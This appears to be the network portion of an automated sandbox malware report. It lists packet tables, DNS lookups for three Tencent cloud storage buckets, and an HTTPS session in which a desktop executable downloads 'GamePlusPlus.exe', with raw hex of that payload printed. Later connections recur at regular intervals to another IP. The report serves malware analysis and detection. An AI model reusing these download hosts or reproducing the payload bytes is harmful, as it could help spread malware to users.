Jan 16, 2025 13:44:16.929454088 CET	443	49707	183.66.100.51	192.168.2.5
Jan 16, 2025 13:44:16.929485083 CET	49707	443	192.168.2.5	183.66.100.51
Jan 16, 2025 13:44:16.929503918 CET	49707	443	192.168.2.5	183.66.100.51
Jan 16, 2025 13:44:16.941310883 CET	443	49707	183.66.100.51	192.168.2.5
Jan 16, 2025 13:44:16.941397905 CET	443	49707	183.66.100.51	192.168.2.5
Jan 16, 2025 13:44:16.941431046 CET	49707	443	192.168.2.5	183.66.100.51
Jan 16, 2025 13:44:16.941446066 CET	443	49707	183.66.100.51	192.168.2.5
Jan 16, 2025 13:44:16.941471100 CET	49707	443	192.168.2.5	183.66.100.51
Jan 16, 2025 13:44:16.941504955 CET	49707	443	192.168.2.5	183.66.100.51
Jan 16, 2025 13:44:16.949937105 CET	443	49707	183.66.100.51	192.168.2.5
Jan 16, 2025 13:44:16.950014114 CET	443	49707	183.66.100.51	192.168.2.5
Jan 16, 2025 13:44:16.950048923 CET	49707	443	192.168.2.5	183.66.100.51
Jan 16, 2025 13:44:16.950067043 CET	443	49707	183.66.100.51	192.168.2.5
Jan 16, 2025 13:44:16.950098038 CET	49707	443	192.168.2.5	183.66.100.51
Jan 16, 2025 13:44:16.950114965 CET	49707	443	192.168.2.5	183.66.100.51
Jan 16, 2025 13:44:16.960663080 CET	443	49707	183.66.100.51	192.168.2.5
Jan 16, 2025 13:44:16.960695982 CET	443	49707	183.66.100.51	192.168.2.5
Jan 16, 2025 13:44:16.960746050 CET	49707	443	192.168.2.5	183.66.100.51
Jan 16, 2025 13:44:16.960771084 CET	443	49707	183.66.100.51	192.168.2.5
Jan 16, 2025 13:44:16.960796118 CET	49707	443	192.168.2.5	183.66.100.51
Jan 16, 2025 13:44:16.960815907 CET	49707	443	192.168.2.5	183.66.100.51
Jan 16, 2025 13:44:16.965861082 CET	443	49707	183.66.100.51	192.168.2.5
Jan 16, 2025 13:44:16.965936899 CET	49707	443	192.168.2.5	183.66.100.51
Jan 16, 2025 13:44:17.003880978 CET	443	49707	183.66.100.51	192.168.2.5
Jan 16, 2025 13:44:17.003956079 CET	443	49707	183.66.100.51	192.168.2.5
Jan 16, 2025 13:44:17.004004955 CET	49707	443	192.168.2.5	183.66.100.51
Jan 16, 2025 13:44:17.004029036 CET	443	49707	183.66.100.51	192.168.2.5
Jan 16, 2025 13:44:17.004055977 CET	49707	443	192.168.2.5	183.66.100.51
Jan 16, 2025 13:44:17.004075050 CET	49707	443	192.168.2.5	183.66.100.51
Jan 16, 2025 13:44:17.004709959 CET	443	49707	183.66.100.51	192.168.2.5
Jan 16, 2025 13:44:17.004774094 CET	443	49707	183.66.100.51	192.168.2.5
Jan 16, 2025 13:44:17.004787922 CET	49707	443	192.168.2.5	183.66.100.51
Jan 16, 2025 13:44:17.004807949 CET	443	49707	183.66.100.51	192.168.2.5
Jan 16, 2025 13:44:17.004838943 CET	49707	443	192.168.2.5	183.66.100.51
Jan 16, 2025 13:44:17.004857063 CET	49707	443	192.168.2.5	183.66.100.51
Jan 16, 2025 13:44:17.005592108 CET	443	49707	183.66.100.51	192.168.2.5
Jan 16, 2025 13:44:17.005669117 CET	49707	443	192.168.2.5	183.66.100.51
Jan 16, 2025 13:44:17.005690098 CET	443	49707	183.66.100.51	192.168.2.5
Jan 16, 2025 13:44:17.005825043 CET	443	49707	183.66.100.51	192.168.2.5
Jan 16, 2025 13:44:17.005892992 CET	49707	443	192.168.2.5	183.66.100.51
Jan 16, 2025 13:44:17.005908012 CET	443	49707	183.66.100.51	192.168.2.5
Jan 16, 2025 13:44:17.008853912 CET	443	49707	183.66.100.51	192.168.2.5
Jan 16, 2025 13:44:17.008928061 CET	443	49707	183.66.100.51	192.168.2.5
Jan 16, 2025 13:44:17.008929968 CET	49707	443	192.168.2.5	183.66.100.51
Jan 16, 2025 13:44:17.008970976 CET	443	49707	183.66.100.51	192.168.2.5
Jan 16, 2025 13:44:17.009012938 CET	49707	443	192.168.2.5	183.66.100.51
Jan 16, 2025 13:44:17.024096012 CET	443	49707	183.66.100.51	192.168.2.5
Jan 16, 2025 13:44:17.024158001 CET	443	49707	183.66.100.51	192.168.2.5
Jan 16, 2025 13:44:17.024209023 CET	49707	443	192.168.2.5	183.66.100.51
Jan 16, 2025 13:44:17.024234056 CET	443	49707	183.66.100.51	192.168.2.5
Jan 16, 2025 13:44:17.024255991 CET	49707	443	192.168.2.5	183.66.100.51
Jan 16, 2025 13:44:17.032955885 CET	443	49707	183.66.100.51	192.168.2.5
Jan 16, 2025 13:44:17.033024073 CET	443	49707	183.66.100.51	192.168.2.5
Jan 16, 2025 13:44:17.033185959 CET	49707	443	192.168.2.5	183.66.100.51
Jan 16, 2025 13:44:17.033186913 CET	49707	443	192.168.2.5	183.66.100.51
Jan 16, 2025 13:44:17.033222914 CET	443	49707	183.66.100.51	192.168.2.5
Jan 16, 2025 13:44:17.041883945 CET	443	49707	183.66.100.51	192.168.2.5
Jan 16, 2025 13:44:17.041946888 CET	443	49707	183.66.100.51	192.168.2.5
Jan 16, 2025 13:44:17.041975975 CET	49707	443	192.168.2.5	183.66.100.51
Jan 16, 2025 13:44:17.042018890 CET	443	49707	183.66.100.51	192.168.2.5
Jan 16, 2025 13:44:17.042068958 CET	49707	443	192.168.2.5	183.66.100.51
Jan 16, 2025 13:44:17.042068958 CET	49707	443	192.168.2.5	183.66.100.51
Jan 16, 2025 13:44:17.052611113 CET	443	49707	183.66.100.51	192.168.2.5
Jan 16, 2025 13:44:17.052681923 CET	443	49707	183.66.100.51	192.168.2.5
Jan 16, 2025 13:44:17.052681923 CET	49707	443	192.168.2.5	183.66.100.51
Jan 16, 2025 13:44:17.052710056 CET	443	49707	183.66.100.51	192.168.2.5
Jan 16, 2025 13:44:17.052750111 CET	49707	443	192.168.2.5	183.66.100.51
Jan 16, 2025 13:44:17.052826881 CET	443	49707	183.66.100.51	192.168.2.5
Jan 16, 2025 13:44:17.052884102 CET	49707	443	192.168.2.5	183.66.100.51
Jan 16, 2025 13:44:17.052901030 CET	443	49707	183.66.100.51	192.168.2.5
Jan 16, 2025 13:44:17.052970886 CET	49707	443	192.168.2.5	183.66.100.51
Jan 16, 2025 13:44:17.053010941 CET	443	49707	183.66.100.51	192.168.2.5
Jan 16, 2025 13:44:17.053091049 CET	49707	443	192.168.2.5	183.66.100.51
Jan 16, 2025 13:44:17.053421974 CET	49707	443	192.168.2.5	183.66.100.51
Jan 16, 2025 13:44:17.078902960 CET	49709	443	192.168.2.5	183.66.100.51
Jan 16, 2025 13:44:17.078943014 CET	443	49709	183.66.100.51	192.168.2.5
Jan 16, 2025 13:44:17.079005003 CET	49709	443	192.168.2.5	183.66.100.51
Jan 16, 2025 13:44:17.079240084 CET	49709	443	192.168.2.5	183.66.100.51
Jan 16, 2025 13:44:17.079253912 CET	443	49709	183.66.100.51	192.168.2.5
Jan 16, 2025 13:44:18.478842974 CET	443	49709	183.66.100.51	192.168.2.5
Jan 16, 2025 13:44:18.480247974 CET	49709	443	192.168.2.5	183.66.100.51
Jan 16, 2025 13:44:18.480290890 CET	443	49709	183.66.100.51	192.168.2.5
Jan 16, 2025 13:44:18.893683910 CET	443	49709	183.66.100.51	192.168.2.5
Jan 16, 2025 13:44:18.893711090 CET	443	49709	183.66.100.51	192.168.2.5
Jan 16, 2025 13:44:18.893771887 CET	49709	443	192.168.2.5	183.66.100.51
Jan 16, 2025 13:44:18.893805981 CET	443	49709	183.66.100.51	192.168.2.5
Jan 16, 2025 13:44:18.941790104 CET	49709	443	192.168.2.5	183.66.100.51
Jan 16, 2025 13:44:18.978526115 CET	443	49709	183.66.100.51	192.168.2.5
Jan 16, 2025 13:44:18.978534937 CET	443	49709	183.66.100.51	192.168.2.5
Jan 16, 2025 13:44:18.978579044 CET	443	49709	183.66.100.51	192.168.2.5
Jan 16, 2025 13:44:18.978620052 CET	49709	443	192.168.2.5	183.66.100.51
Jan 16, 2025 13:44:18.978648901 CET	443	49709	183.66.100.51	192.168.2.5
Jan 16, 2025 13:44:18.978701115 CET	49709	443	192.168.2.5	183.66.100.51
Jan 16, 2025 13:44:18.978724957 CET	49709	443	192.168.2.5	183.66.100.51
Jan 16, 2025 13:44:18.980384111 CET	443	49709	183.66.100.51	192.168.2.5
Jan 16, 2025 13:44:18.980489016 CET	49709	443	192.168.2.5	183.66.100.51
Jan 16, 2025 13:44:18.980503082 CET	443	49709	183.66.100.51	192.168.2.5
Jan 16, 2025 13:44:18.982188940 CET	443	49709	183.66.100.51	192.168.2.5
Jan 16, 2025 13:44:18.982259035 CET	443	49709	183.66.100.51	192.168.2.5
Jan 16, 2025 13:44:18.982275963 CET	49709	443	192.168.2.5	183.66.100.51
Jan 16, 2025 13:44:18.982320070 CET	49709	443	192.168.2.5	183.66.100.51
Jan 16, 2025 13:44:18.982711077 CET	49709	443	192.168.2.5	183.66.100.51
Jan 16, 2025 13:44:19.519104004 CET	49727	443	192.168.2.5	183.66.100.45
Jan 16, 2025 13:44:19.519153118 CET	443	49727	183.66.100.45	192.168.2.5
Jan 16, 2025 13:44:19.519383907 CET	49727	443	192.168.2.5	183.66.100.45
Jan 16, 2025 13:44:19.519853115 CET	49727	443	192.168.2.5	183.66.100.45
Jan 16, 2025 13:44:19.519876003 CET	443	49727	183.66.100.45	192.168.2.5
Jan 16, 2025 13:44:20.929039955 CET	443	49727	183.66.100.45	192.168.2.5
Jan 16, 2025 13:44:20.929130077 CET	49727	443	192.168.2.5	183.66.100.45
Jan 16, 2025 13:44:20.931798935 CET	443	49727	183.66.100.45	192.168.2.5
Jan 16, 2025 13:44:20.931878090 CET	49727	443	192.168.2.5	183.66.100.45
Jan 16, 2025 13:44:20.933641911 CET	49727	443	192.168.2.5	183.66.100.45
Jan 16, 2025 13:44:20.933651924 CET	443	49727	183.66.100.45	192.168.2.5
Jan 16, 2025 13:44:20.934571981 CET	443	49727	183.66.100.45	192.168.2.5
Jan 16, 2025 13:44:20.943084955 CET	49727	443	192.168.2.5	183.66.100.45
Jan 16, 2025 13:44:20.987325907 CET	443	49727	183.66.100.45	192.168.2.5
Jan 16, 2025 13:44:21.347686052 CET	443	49727	183.66.100.45	192.168.2.5
Jan 16, 2025 13:44:21.347769976 CET	443	49727	183.66.100.45	192.168.2.5
Jan 16, 2025 13:44:21.347877979 CET	49727	443	192.168.2.5	183.66.100.45
Jan 16, 2025 13:44:21.347893000 CET	443	49727	183.66.100.45	192.168.2.5
Jan 16, 2025 13:44:21.352576971 CET	443	49727	183.66.100.45	192.168.2.5
Jan 16, 2025 13:44:21.352668047 CET	49727	443	192.168.2.5	183.66.100.45
Jan 16, 2025 13:44:21.352677107 CET	443	49727	183.66.100.45	192.168.2.5
Jan 16, 2025 13:44:21.394885063 CET	49727	443	192.168.2.5	183.66.100.45
Jan 16, 2025 13:44:21.430958986 CET	443	49727	183.66.100.45	192.168.2.5
Jan 16, 2025 13:44:21.430990934 CET	443	49727	183.66.100.45	192.168.2.5
Jan 16, 2025 13:44:21.431032896 CET	49727	443	192.168.2.5	183.66.100.45
Jan 16, 2025 13:44:21.431066036 CET	49727	443	192.168.2.5	183.66.100.45
Jan 16, 2025 13:44:21.431072950 CET	443	49727	183.66.100.45	192.168.2.5
Jan 16, 2025 13:44:21.434207916 CET	443	49727	183.66.100.45	192.168.2.5
Jan 16, 2025 13:44:21.434290886 CET	49727	443	192.168.2.5	183.66.100.45
Jan 16, 2025 13:44:21.434299946 CET	443	49727	183.66.100.45	192.168.2.5
Jan 16, 2025 13:44:21.439372063 CET	443	49727	183.66.100.45	192.168.2.5
Jan 16, 2025 13:44:21.439445019 CET	49727	443	192.168.2.5	183.66.100.45
Jan 16, 2025 13:44:21.439445972 CET	443	49727	183.66.100.45	192.168.2.5
Jan 16, 2025 13:44:21.439476967 CET	443	49727	183.66.100.45	192.168.2.5
Jan 16, 2025 13:44:21.439549923 CET	49727	443	192.168.2.5	183.66.100.45
Jan 16, 2025 13:44:21.517493010 CET	443	49727	183.66.100.45	192.168.2.5
Jan 16, 2025 13:44:21.517518044 CET	443	49727	183.66.100.45	192.168.2.5
Jan 16, 2025 13:44:21.517575026 CET	49727	443	192.168.2.5	183.66.100.45
Jan 16, 2025 13:44:21.517585993 CET	443	49727	183.66.100.45	192.168.2.5
Jan 16, 2025 13:44:21.517636061 CET	49727	443	192.168.2.5	183.66.100.45
Jan 16, 2025 13:44:21.519434929 CET	443	49727	183.66.100.45	192.168.2.5
Jan 16, 2025 13:44:21.519457102 CET	443	49727	183.66.100.45	192.168.2.5
Jan 16, 2025 13:44:21.519510984 CET	49727	443	192.168.2.5	183.66.100.45
Jan 16, 2025 13:44:21.519520998 CET	443	49727	183.66.100.45	192.168.2.5
Jan 16, 2025 13:44:21.519562960 CET	49727	443	192.168.2.5	183.66.100.45
Jan 16, 2025 13:44:21.522825956 CET	443	49727	183.66.100.45	192.168.2.5
Jan 16, 2025 13:44:21.522855043 CET	443	49727	183.66.100.45	192.168.2.5
Jan 16, 2025 13:44:21.522887945 CET	49727	443	192.168.2.5	183.66.100.45
Jan 16, 2025 13:44:21.522897005 CET	443	49727	183.66.100.45	192.168.2.5
Jan 16, 2025 13:44:21.522927999 CET	49727	443	192.168.2.5	183.66.100.45
Jan 16, 2025 13:44:21.522945881 CET	49727	443	192.168.2.5	183.66.100.45
Jan 16, 2025 13:44:21.525965929 CET	443	49727	183.66.100.45	192.168.2.5
Jan 16, 2025 13:44:21.525990963 CET	443	49727	183.66.100.45	192.168.2.5
Jan 16, 2025 13:44:21.526032925 CET	49727	443	192.168.2.5	183.66.100.45
Jan 16, 2025 13:44:21.526041031 CET	443	49727	183.66.100.45	192.168.2.5
Jan 16, 2025 13:44:21.526066065 CET	49727	443	192.168.2.5	183.66.100.45
Jan 16, 2025 13:44:21.526083946 CET	49727	443	192.168.2.5	183.66.100.45
Jan 16, 2025 13:44:21.604471922 CET	443	49727	183.66.100.45	192.168.2.5
Jan 16, 2025 13:44:21.604497910 CET	443	49727	183.66.100.45	192.168.2.5
Jan 16, 2025 13:44:21.604563951 CET	49727	443	192.168.2.5	183.66.100.45
Jan 16, 2025 13:44:21.604574919 CET	443	49727	183.66.100.45	192.168.2.5
Jan 16, 2025 13:44:21.604617119 CET	49727	443	192.168.2.5	183.66.100.45
Jan 16, 2025 13:44:21.606180906 CET	443	49727	183.66.100.45	192.168.2.5
Jan 16, 2025 13:44:21.606201887 CET	443	49727	183.66.100.45	192.168.2.5
Jan 16, 2025 13:44:21.606251001 CET	49727	443	192.168.2.5	183.66.100.45
Jan 16, 2025 13:44:21.606260061 CET	443	49727	183.66.100.45	192.168.2.5
Jan 16, 2025 13:44:21.606273890 CET	443	49727	183.66.100.45	192.168.2.5
Jan 16, 2025 13:44:21.606275082 CET	49727	443	192.168.2.5	183.66.100.45
Jan 16, 2025 13:44:21.606314898 CET	443	49727	183.66.100.45	192.168.2.5
Jan 16, 2025 13:44:21.606326103 CET	49727	443	192.168.2.5	183.66.100.45
Jan 16, 2025 13:44:21.606333971 CET	443	49727	183.66.100.45	192.168.2.5
Jan 16, 2025 13:44:21.606370926 CET	49727	443	192.168.2.5	183.66.100.45
Jan 16, 2025 13:44:21.606399059 CET	49727	443	192.168.2.5	183.66.100.45
Jan 16, 2025 13:44:21.607502937 CET	443	49727	183.66.100.45	192.168.2.5
Jan 16, 2025 13:44:21.607578993 CET	49727	443	192.168.2.5	183.66.100.45
Jan 16, 2025 13:44:21.607595921 CET	443	49727	183.66.100.45	192.168.2.5
Jan 16, 2025 13:44:21.614414930 CET	443	49727	183.66.100.45	192.168.2.5
Jan 16, 2025 13:44:21.614437103 CET	443	49727	183.66.100.45	192.168.2.5
Jan 16, 2025 13:44:21.614492893 CET	49727	443	192.168.2.5	183.66.100.45
Jan 16, 2025 13:44:21.614500046 CET	443	49727	183.66.100.45	192.168.2.5
Jan 16, 2025 13:44:21.620286942 CET	443	49727	183.66.100.45	192.168.2.5
Jan 16, 2025 13:44:21.620366096 CET	49727	443	192.168.2.5	183.66.100.45
Jan 16, 2025 13:44:21.620374918 CET	443	49727	183.66.100.45	192.168.2.5
Jan 16, 2025 13:44:21.625755072 CET	443	49727	183.66.100.45	192.168.2.5
Jan 16, 2025 13:44:21.625827074 CET	49727	443	192.168.2.5	183.66.100.45
Jan 16, 2025 13:44:21.625847101 CET	443	49727	183.66.100.45	192.168.2.5
Jan 16, 2025 13:44:21.628875971 CET	443	49727	183.66.100.45	192.168.2.5
Jan 16, 2025 13:44:21.628942013 CET	49727	443	192.168.2.5	183.66.100.45
Jan 16, 2025 13:44:21.628951073 CET	443	49727	183.66.100.45	192.168.2.5
Jan 16, 2025 13:44:21.639035940 CET	443	49727	183.66.100.45	192.168.2.5
Jan 16, 2025 13:44:21.639060974 CET	443	49727	183.66.100.45	192.168.2.5
Jan 16, 2025 13:44:21.639105082 CET	49727	443	192.168.2.5	183.66.100.45
Jan 16, 2025 13:44:21.639115095 CET	443	49727	183.66.100.45	192.168.2.5
Jan 16, 2025 13:44:21.639147997 CET	49727	443	192.168.2.5	183.66.100.45
Jan 16, 2025 13:44:21.655287981 CET	443	49727	183.66.100.45	192.168.2.5
Jan 16, 2025 13:44:21.655374050 CET	49727	443	192.168.2.5	183.66.100.45
Jan 16, 2025 13:44:21.655381918 CET	443	49727	183.66.100.45	192.168.2.5
Jan 16, 2025 13:44:21.655414104 CET	443	49727	183.66.100.45	192.168.2.5
Jan 16, 2025 13:44:21.655450106 CET	49727	443	192.168.2.5	183.66.100.45
Jan 16, 2025 13:44:21.691087961 CET	443	49727	183.66.100.45	192.168.2.5
Jan 16, 2025 13:44:21.691159964 CET	49727	443	192.168.2.5	183.66.100.45
Jan 16, 2025 13:44:21.691171885 CET	443	49727	183.66.100.45	192.168.2.5
Jan 16, 2025 13:44:21.691560030 CET	443	49727	183.66.100.45	192.168.2.5
Jan 16, 2025 13:44:21.691586018 CET	443	49727	183.66.100.45	192.168.2.5
Jan 16, 2025 13:44:21.691628933 CET	49727	443	192.168.2.5	183.66.100.45
Jan 16, 2025 13:44:21.691638947 CET	443	49727	183.66.100.45	192.168.2.5
Jan 16, 2025 13:44:21.691668987 CET	49727	443	192.168.2.5	183.66.100.45
Jan 16, 2025 13:44:21.693766117 CET	443	49727	183.66.100.45	192.168.2.5
Jan 16, 2025 13:44:21.693828106 CET	443	49727	183.66.100.45	192.168.2.5
Jan 16, 2025 13:44:21.693837881 CET	49727	443	192.168.2.5	183.66.100.45
Jan 16, 2025 13:44:21.693857908 CET	443	49727	183.66.100.45	192.168.2.5
Jan 16, 2025 13:44:21.693895102 CET	49727	443	192.168.2.5	183.66.100.45
Jan 16, 2025 13:44:21.694145918 CET	443	49727	183.66.100.45	192.168.2.5
Jan 16, 2025 13:44:21.694206953 CET	443	49727	183.66.100.45	192.168.2.5
Jan 16, 2025 13:44:21.694212914 CET	49727	443	192.168.2.5	183.66.100.45
Jan 16, 2025 13:44:21.694230080 CET	443	49727	183.66.100.45	192.168.2.5
Jan 16, 2025 13:44:21.694266081 CET	49727	443	192.168.2.5	183.66.100.45
Jan 16, 2025 13:44:21.694282055 CET	49727	443	192.168.2.5	183.66.100.45
Jan 16, 2025 13:44:21.694287062 CET	443	49727	183.66.100.45	192.168.2.5
Jan 16, 2025 13:44:21.694472075 CET	443	49727	183.66.100.45	192.168.2.5
Jan 16, 2025 13:44:21.694529057 CET	49727	443	192.168.2.5	183.66.100.45
Jan 16, 2025 13:44:21.694631100 CET	49727	443	192.168.2.5	183.66.100.45
Jan 16, 2025 13:44:21.713660955 CET	49745	443	192.168.2.5	183.66.100.51
Jan 16, 2025 13:44:21.713757038 CET	443	49745	183.66.100.51	192.168.2.5
Jan 16, 2025 13:44:21.713871002 CET	49745	443	192.168.2.5	183.66.100.51
Jan 16, 2025 13:44:21.714127064 CET	49745	443	192.168.2.5	183.66.100.51
Jan 16, 2025 13:44:21.714148045 CET	443	49745	183.66.100.51	192.168.2.5
Jan 16, 2025 13:44:23.127135038 CET	443	49745	183.66.100.51	192.168.2.5
Jan 16, 2025 13:44:23.136483908 CET	49745	443	192.168.2.5	183.66.100.51
Jan 16, 2025 13:44:23.136527061 CET	443	49745	183.66.100.51	192.168.2.5
Jan 16, 2025 13:44:23.529023886 CET	443	49745	183.66.100.51	192.168.2.5
Jan 16, 2025 13:44:23.529050112 CET	443	49745	183.66.100.51	192.168.2.5
Jan 16, 2025 13:44:23.529098988 CET	443	49745	183.66.100.51	192.168.2.5
Jan 16, 2025 13:44:23.529287100 CET	49745	443	192.168.2.5	183.66.100.51
Jan 16, 2025 13:44:23.529287100 CET	49745	443	192.168.2.5	183.66.100.51
Jan 16, 2025 13:44:23.529680967 CET	49745	443	192.168.2.5	183.66.100.51
Jan 16, 2025 13:44:38.329343081 CET	49852	443	192.168.2.5	149.115.250.19
Jan 16, 2025 13:44:38.329396009 CET	443	49852	149.115.250.19	192.168.2.5
Jan 16, 2025 13:44:38.329560041 CET	49852	443	192.168.2.5	149.115.250.19
Jan 16, 2025 13:44:58.336949110 CET	49852	443	192.168.2.5	149.115.250.19
Jan 16, 2025 13:44:58.336967945 CET	443	49852	149.115.250.19	192.168.2.5
Jan 16, 2025 13:45:18.345074892 CET	49852	443	192.168.2.5	149.115.250.19
Jan 16, 2025 13:45:18.345133066 CET	443	49852	149.115.250.19	192.168.2.5
Jan 16, 2025 13:45:26.943731070 CET	49852	443	192.168.2.5	149.115.250.19
Jan 16, 2025 13:45:34.954207897 CET	49997	443	192.168.2.5	149.115.250.19
Jan 16, 2025 13:45:34.954329967 CET	443	49997	149.115.250.19	192.168.2.5
Jan 16, 2025 13:45:34.954457045 CET	49997	443	192.168.2.5	149.115.250.19
Jan 16, 2025 13:45:54.957385063 CET	49997	443	192.168.2.5	149.115.250.19
Jan 16, 2025 13:45:54.957420111 CET	443	49997	149.115.250.19	192.168.2.5
Jan 16, 2025 13:46:08.131712914 CET	49997	443	192.168.2.5	149.115.250.19
Jan 16, 2025 13:46:34.959754944 CET	50000	443	192.168.2.5	149.115.250.19
Jan 16, 2025 13:46:34.959877968 CET	443	50000	149.115.250.19	192.168.2.5
Jan 16, 2025 13:46:34.959985018 CET	50000	443	192.168.2.5	149.115.250.19
Jan 16, 2025 13:46:54.972321987 CET	50000	443	192.168.2.5	149.115.250.19
Jan 16, 2025 13:46:54.972383022 CET	443	50000	149.115.250.19	192.168.2.5
Jan 16, 2025 13:47:07.086292028 CET	50000	443	192.168.2.5	149.115.250.19

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 16, 2025 13:44:05.841769934 CET	52531	53	192.168.2.5	1.1.1.1
Jan 16, 2025 13:44:06.625199080 CET	53	52531	1.1.1.1	192.168.2.5
Jan 16, 2025 13:44:12.136002064 CET	60790	53	192.168.2.5	1.1.1.1
Jan 16, 2025 13:44:12.606576920 CET	53	60790	1.1.1.1	192.168.2.5
Jan 16, 2025 13:44:18.993666887 CET	49462	53	192.168.2.5	1.1.1.1
Jan 16, 2025 13:44:19.517714977 CET	53	49462	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 16, 2025 13:44:05.841769934 CET	192.168.2.5	1.1.1.1	0x2e35	Standard query (0)	wwwchongqingget-1328031368.cos.ap-chongqing.myqcloud.com	A (IP address)	IN (0x0001)	false
Jan 16, 2025 13:44:12.136002064 CET	192.168.2.5	1.1.1.1	0xb992	Standard query (0)	www19daxcsdaf-1328031368.cos.ap-guangzhou.myqcloud.com	A (IP address)	IN (0x0001)	false
Jan 16, 2025 13:44:18.993666887 CET	192.168.2.5	1.1.1.1	0x4963	Standard query (0)	wwwwgetmore-1328031368.cos.ap-chongqing.myqcloud.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 16, 2025 13:44:06.625199080 CET	1.1.1.1	192.168.2.5	0x2e35	No error (0)	wwwchongqingget-1328031368.cos.ap-chongqing.myqcloud.com	cq.file.myqcloud.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 16, 2025 13:44:06.625199080 CET	1.1.1.1	192.168.2.5	0x2e35	No error (0)	cq.file.myqcloud.com		183.66.100.51	A (IP address)	IN (0x0001)	false
Jan 16, 2025 13:44:06.625199080 CET	1.1.1.1	192.168.2.5	0x2e35	No error (0)	cq.file.myqcloud.com		183.66.100.45	A (IP address)	IN (0x0001)	false
Jan 16, 2025 13:44:12.606576920 CET	1.1.1.1	192.168.2.5	0xb992	No error (0)	www19daxcsdaf-1328031368.cos.ap-guangzhou.myqcloud.com	gz.file.myqcloud.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 16, 2025 13:44:12.606576920 CET	1.1.1.1	192.168.2.5	0xb992	No error (0)	gz.file.myqcloud.com		159.75.57.35	A (IP address)	IN (0x0001)	false
Jan 16, 2025 13:44:12.606576920 CET	1.1.1.1	192.168.2.5	0xb992	No error (0)	gz.file.myqcloud.com		159.75.57.69	A (IP address)	IN (0x0001)	false
Jan 16, 2025 13:44:19.517714977 CET	1.1.1.1	192.168.2.5	0x4963	No error (0)	wwwwgetmore-1328031368.cos.ap-chongqing.myqcloud.com	cq.file.myqcloud.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 16, 2025 13:44:19.517714977 CET	1.1.1.1	192.168.2.5	0x4963	No error (0)	cq.file.myqcloud.com		183.66.100.45	A (IP address)	IN (0x0001)	false
Jan 16, 2025 13:44:19.517714977 CET	1.1.1.1	192.168.2.5	0x4963	No error (0)	cq.file.myqcloud.com		183.66.100.51	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

wwwchongqingget-1328031368.cos.ap-chongqing.myqcloud.com

www19daxcsdaf-1328031368.cos.ap-guangzhou.myqcloud.com

wwwwgetmore-1328031368.cos.ap-chongqing.myqcloud.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49705	183.66.100.51	443	5892	C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-16 12:44:11 UTC	122	OUT	GET /GamePlusPlus.exe HTTP/1.1 Host: wwwchongqingget-1328031368.cos.ap-chongqing.myqcloud.com Connection: Keep-Alive
2025-01-16 12:44:11 UTC	472	IN	HTTP/1.1 200 OK Content-Type: application/x-msdownload Content-Length: 251488 Connection: close Accept-Ranges: bytes Content-Disposition: attachment Date: Thu, 16 Jan 2025 12:44:11 GMT ETag: "8038ebb15ec202ad0a25564e55cdf32d" Last-Modified: Fri, 10 Jan 2025 23:33:38 GMT Server: tencent-cos x-cos-force-download: true x-cos-hash-crc64ecma: 3850572715590273645 x-cos-request-id: Njc4OGZmMWJfOTY3NDA1MGJfYjNhN19iYjFkYTk2 x-cos-server-side-encryption: AES256
2025-01-16 12:44:11 UTC	7732	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 56 4c 56 00 01 00 00 00 00 aa 03 00 64 74 57 67 8e 34 ad 80 ce 03 33 48 6c 71 5d cf 9e 73 38 d8 4e 1c 11 02 94 75 6a ca cd 67 0b b2 33 75 b0 0c 4a bd 75 8c 5e 6f 16 04 41 05 68 74 98 bf 2b fd 7d 15 34 a5 fe 06 46 ad 81 43 a5 b5 a6 0c a5 7d 3a 1f 7e 14 7e 60 f5 e5 a3 e6 5d 54 c8 6a 56 e1 e5 56 c5 75 83 63 0a ec 65 1d 28 5f 66 9d 9e 55 9a a8 36 9e 5e 8b 2f 42 7d 69 fd 85 c9 5c 3a fb 75 b8 92 df f7 be f3 90 4f c9 a0 40 62 f9 de e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@VLVdtWg43Hlq]s8Nujg3uJu^oAht+}4FC}:~~`]TjVVuce(_fU6^/B}i\:uO@b
2025-01-16 12:44:11 UTC	8184	IN	Data Raw: 48 8b 05 d5 c7 02 00 48 85 c0 75 18 48 8d 55 6f 48 8d 0d e5 02 02 00 ff 15 57 fd 01 00 48 89 05 b8 c7 02 00 4c 8b 10 45 33 c9 4c 8d 05 fb 02 02 00 48 8d 15 d4 02 02 00 48 8b c8 41 ff 52 30 8b d8 48 8d 0d 44 c7 02 00 e8 df f5 ff ff 4c 8b 15 a0 c7 02 00 4d 85 d2 75 1b 48 8d 55 6f 48 8d 0d d8 02 02 00 ff 15 0a fd 01 00 4c 8b d0 48 89 05 80 c7 02 00 48 8d 4c 24 30 48 83 7d 8f 10 48 0f 43 4c 24 30 4c 8d 4d b7 48 83 7d cf 10 4c 0f 43 4d b7 49 8b 02 48 89 4c 24 20 44 8b c3 49 8b d7 49 8b ca ff 10 90 48 8b 55 8f 48 83 fa 10 72 32 48 ff c2 48 8b 4c 24 30 48 8b c1 48 81 fa 00 10 00 00 72 19 48 83 c2 27 48 8b 49 f8 48 2b c1 48 83 c0 f8 48 83 f8 1f 0f 87 91 00 00 00 e8 36 c5 01 00 66 0f 6f 05 e2 02 02 00 f3 0f 7f 45 87 c6 44 24 30 00 48 8b 55 cf 48 83 fa 10 72 2d 48 Data Ascii: HHuHUoHWHLE3LHHAR0HDLMuHUoHLHHL$0H}HCL$0LMH}LCMIHL$ DIIHUHr2HHL$0HHrH'HIH+HH6foED$0HUHr-H
